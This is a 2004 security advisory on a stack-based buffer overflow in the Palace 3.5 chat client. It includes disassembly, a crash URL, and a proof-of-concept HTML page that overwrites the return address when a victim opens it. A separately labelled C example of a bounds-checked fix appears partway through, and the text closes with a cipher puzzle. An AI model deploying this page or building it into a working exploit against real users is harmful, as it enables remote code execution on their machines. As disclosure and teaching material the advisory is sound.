
thepalace.txt

Posted Feb 8, 2004
Authored by Peter Winter-Smith | Site elitehaven.net

Palace chat software versions 3.5 and below are susceptible to a stack overflow client-side when accessing hyperlinks.

tags | advisory, overflow
SHA-256 | 6b59705371a6f396bf8cd5763612bbfe1c4172c46ed1a2384433e4941833b2fb

The Palace 3.x (Client) Stack Overflow Vulnerability

####################################################

Credit:
Author : Peter Winter-Smith

Software:
Packages : The Palace 3.5 (Client)
Version : 3.5 and below
Vendor : 'Copyright © 1996-2000 Communities.com'
Vendor Url : http://www.thepalace.com/

Vulnerability:
Bug Type : Stack-based Buffer Overflow
Severity : Highly Critical
+ Remote Code Execution

1. Description of Software

"The Palace is the FREE graphical chat. Create and wear your own picture
(avatar). Build your very own chat server."
- Vendor's website


2. Bug Information

(a). Stack-based Buffer Overflow

When using the Palace chat software, it is immediately obvious that the
most common and efficient method of allowing users to join a specific chat
server is to construct a special hyperlink which will automatically load
the application and cause it to connect to the specified location.

These hyperlinks are constructed as follows:


palace://some.machine:9998/


The port may be omitted from the url if the server is running on the
default port 9998/tcp.

There exists a stack-based buffer overflow condition which can be caused
to take effect when a user of the Palace chat software visits a link
similar to the following:


palace://('a'x118)('BBBB')('XXXX')


In the above url, a saved base pointer is overwritten with 42424242h, and
a saved return address is overwritten with 58585858h.


(i). Part of the Vulnerable Code

From a quick look at the Palace chat application, it is evident that the
overflow is the result of a dangerous call to 'wsprintfA'.

The saved return address which is overwritten is placed on the stack by an
instruction found at 004081D7:


004081D7 |. E8 1DA4FFFF CALL Palace32.004025F9
004081DC |. 59 POP ECX

...

004025F9 $ E9 9CC00000 JMP Palace32.0040E69A


Within the procedure beginning at 0040E69A, at offset 0040E745 the address
of wsprintfA is loaded into the esi register. At 0040E78A a buffer of 84h
(132 bytes) is designated to hold the formatted output from calling
wsprintfA (the actual formatting string being used is
"Connecting to %s:%d"). Then, at 0040E792 the fatal call is made!


0040E745 |. 8B35 ACC04900 MOV ESI,DWORD PTR DS:[<&USER32.wsprintfA>]

...

0040E78A |. 8D85 7CFFFFFF LEA EAX,DWORD PTR SS:[EBP-84]
0040E790 |. 53 PUSH EBX
0040E791 |. 50 PUSH EAX
0040E792 |. FFD6 CALL ESI


If an overly long server address is specified in the url (as the '%s'
formatting argument), the 132 byte buffer is overflowed and the saved
return address from 004081D7 is completely overwritten!

When the function returns, at line 0040E7FA, code execution resumes from
an arbitrary address which an attacker can supply!


0040E7F7 |> 5F POP EDI
0040E7F8 |. 5E POP ESI
0040E7F9 |. C9 LEAVE
0040E7FA \. C3 RETN
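As an added example (not code from the advisory or from the Palace client), the pattern behind the bug and its fix in C: a bounded replacement for the wsprintfA("Connecting to %s:%d") call into the 132-byte stack buffer, beside a palace://host[:port] parser that refuses any host that could not fit it. MAX_HOST, accepted_port and poc_url_rejected are names chosen here; the rebuilt 118-byte URL is constructed input.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define CONNECT_BUF 132   /* the 84h-byte stack buffer named in the advisory */
#define DEFAULT_PORT 9998
#define MAX_HOST (CONNECT_BUF - 14 - 1 - 5 - 1) /* "Connecting to ", ':', 5 digits, NUL */

/* Bounded stand-in for the unbounded wsprintfA("Connecting to %s:%d") call:
 * 0 on success, -1 (and an empty string) if the message would not fit. */
int format_connect_msg(char *out, size_t outsz, const char *host, int port)
{
    int n = snprintf(out, outsz, "Connecting to %s:%d", host, port);
    if (n < 0 || (size_t)n >= outsz) { out[0] = '\0'; return -1; }
    return 0;
}

/* Parses palace://host[:port][/]; a host longer than hostsz-1 is refused, not
 * copied. Constructed for this example, not the Palace client's own parser. */
int parse_palace_url(const char *url, char *host, size_t hostsz, int *port)
{
    if (strncmp(url, "palace://", 9) != 0) return -1;
    const char *p = url + 9;                     /* skip the scheme */
    size_t hlen = strcspn(p, ":/");
    if (hlen == 0 || hlen >= hostsz) return -1;  /* too long: refuse, don't copy */
    memcpy(host, p, hlen); host[hlen] = '\0';
    *port = DEFAULT_PORT;                        /* port may be omitted: 9998/tcp */
    if (p[hlen] == ':') {
        char *end; long v = strtol(p + hlen + 1, &end, 10);
        if (end == p + hlen + 1 || v < 1 || v > 65535) return -1;
        *port = (int)v;
    }
    return 0;
}

/* Port a well-formed URL would connect to, or -1 if either layer refuses it. */
int accepted_port(const char *url)
{
    char host[MAX_HOST + 1], msg[CONNECT_BUF]; int port;
    if (parse_palace_url(url, host, sizeof host, &port) != 0) return -1;
    return format_connect_msg(msg, sizeof msg, host, port) == 0 ? port : -1;
}

/* Rebuilds the advisory's crash URL shape (118 'a', "BBBB", "XXXX") in memory;
 * 1 if both the parser and the bounded formatter refuse it, 0 otherwise. */
int poc_url_rejected(void)
{
    char url[9 + 118 + 9], msg[CONNECT_BUF];
    memcpy(url, "palace://", 9);
    memset(url + 9, 'a', 118);
    memcpy(url + 9 + 118, "BBBBXXXX", 9);        /* the 9 includes the NUL */
    return accepted_port(url) == -1 &&
           format_connect_msg(msg, sizeof msg, url + 9, DEFAULT_PORT) == -1;
}
```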



3. Proof of Concept Code

The nature of this flaw allows exploitation to take place from simply
viewing a specially crafted web-page! Below is such a page that will cause
an access violation when attempting to execute code located at 58585858h!
Since I am getting a little bored of actually writing exploit code, the
exploitation of this flaw is left as an exercise to the reader!


------------------------------[badpage.html]------------------------------
<html><body><script>
window.open("palace://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaBBBBXXXX
")</script></body></html>
--------------------------------------------------------------------------


Please remove any line-breaks which occur during the re-formatting of the
overly long server address string by my email client otherwise the crash
will probably not go as planned!


4. Patches - Workarounds

None as of 07/02/2004.


5. Credits

The discovery, analysis and exploitation of this flaw are the result of
research carried out by Peter Winter-Smith. I would ask that you do not
regard any of the analysis to be 'set in stone', and that if investigating
this flaw you retrace the steps detailed earlier for yourself.

Greets and thanks to:
David and Mark Litchfield, JJ Gray (Nexus), Todd and all the
packetstorm crew, Luigi Auriemma, Bahaa Naamneh, sean(gilbert(perlboy)),
pv8man, nick k., Joel J. and Martine.


6. Extras!

(a). Quick Question

I have a quick question for all those who actually read my advisories:
Does the analysis of the vulnerable code within the applications that I
find bugs in help anyone at all? I would be interested to know if you
consider these a worthwhile addition, or a waste of space! Email me:
peter4020@hotmail.com and let me know what you think :-)


(b). Fun Challenge

If you need something to do during your coffee breaks, try and crack this
extremely simple yet interesting encryption routine which I have designed!
It's very basic, and does not require any advanced mathematical knowledge
to crack. A couple of encrypted strings are below:

'wdle lo emyduksaec eoah vt mrec eo enadrlaey'

'b! mhtnrfglaindinptrwni eterc y'too luokiahtse!'

Hints:
- Remove the single quotes before starting!
- Spacing is important!
- 'able was i ere i saw elba' is exactly the same decrypted as it is
encrypted!


o This document should be mirrored at:
http://www.elitehaven.net/thepalace.txt
